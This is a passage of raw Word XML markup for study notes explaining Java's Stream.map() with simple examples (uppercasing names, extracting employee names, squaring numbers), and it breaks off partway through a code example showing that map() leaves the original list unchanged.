        <w:t>Function&lt;T, R&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as an argument and produces a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the transformed values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DABD5D9" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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02C79FF5">
          <v:rect id="_x0000_i1731" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2437DD59" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865B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yntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E335EF3"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t;R&gt; Stream&lt;R&gt; map(Function&lt;? super T, ? extends R&gt; mapper);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE4BEB" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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F503952">
          <v:rect id="_x0000_i1732" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4366AF" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865B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Use Cases of map()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C7527E" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865B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Convert to Uppercase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B47C9F"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String&gt; names = Arrays.asList("siddhant", "arpan");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1DB93A"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String&gt; upperNames = names.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B57BB43"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String::toUpperCase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB7E755"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D329A97"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Output: [SIDDHANT, ARPAN]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196196A8" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865B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Extract Field from Object List:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDD71FD"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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6AD145"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EB4685"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nt age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFD18EF"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onstructor, getters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B260A3"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33248ED" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865BD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B245B4E"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Employee&gt; empList = ...;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF8373" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865BD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF28A87"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String&gt; empNames = empList.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B915E9"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Employee::getName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658A86AD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5D7E6E" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865B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Convert Integers to Squares:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C804CC"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6CE0DA"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Integer&gt; squares = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFABD66"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n -&gt; n * n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4040C05B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2035C8"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Output: [1, 4, 9, 16]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BC0183" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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3B3C4EE">
          <v:rect id="_x0000_i1733" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0492DFDA" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A258D5" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ap()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> transforms each element </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one-to-one</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C36A46B" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>intermediate operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – it returns a new stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E69D2" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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d for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data conversion, field extraction, transformations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163E8C09"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ould you like to see map() in a more advanced use case like DTO conversion or using it in a microservices scenario?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3FF58B" w14:textId="5DF850D7" w:rsidR="00936CAC"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06496C1">
          <v:rect id="_x0000_i1734" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A09D35C" w14:textId="3E380AB8" w:rsidR="008E2975" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2975" w:rsidP="008E2975">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Does map() change existing data?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3677D780" w14:textId="5A32ECD1" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="00EA0264">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, map() does </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NOT modify</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the original data (input list or collection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9313FB" w14:textId="77777777" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="00236C34">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>creates a new stream</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with transformed elements, </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leaving the original data unchanged</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B724CCA" w14:textId="77777777" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="008E2975">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example to prove:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6128A5" w14:textId="77777777" w:rsidR="00207C68" w:rsidRPr="00207C68" w:rsidRDefault="00207C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360760"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> names </w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Siddhant"</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Patni"</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666140A5" w14:textId="77777777" w:rsidR="00207C68" w:rsidRPr="00207C68" w:rsidRDefault="00207C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360760"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF9D9C6" w14:textId="77777777" w:rsidR="00207C68" w:rsidRPr="00207C68" w:rsidRDefault="00207C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360760"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>names</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2466FB" w14:textId="77777777" w:rsidR="00207C68" w:rsidRPr="00207C68" w:rsidRDefault="00207C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360760"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>toUpperCase</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8F9429" w14:textId="77777777" w:rsidR="00207C68" w:rsidRPr="00207C68" w:rsidRDefault="00207C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360760"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>collect</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Collectors</w:t>
      </w:r>
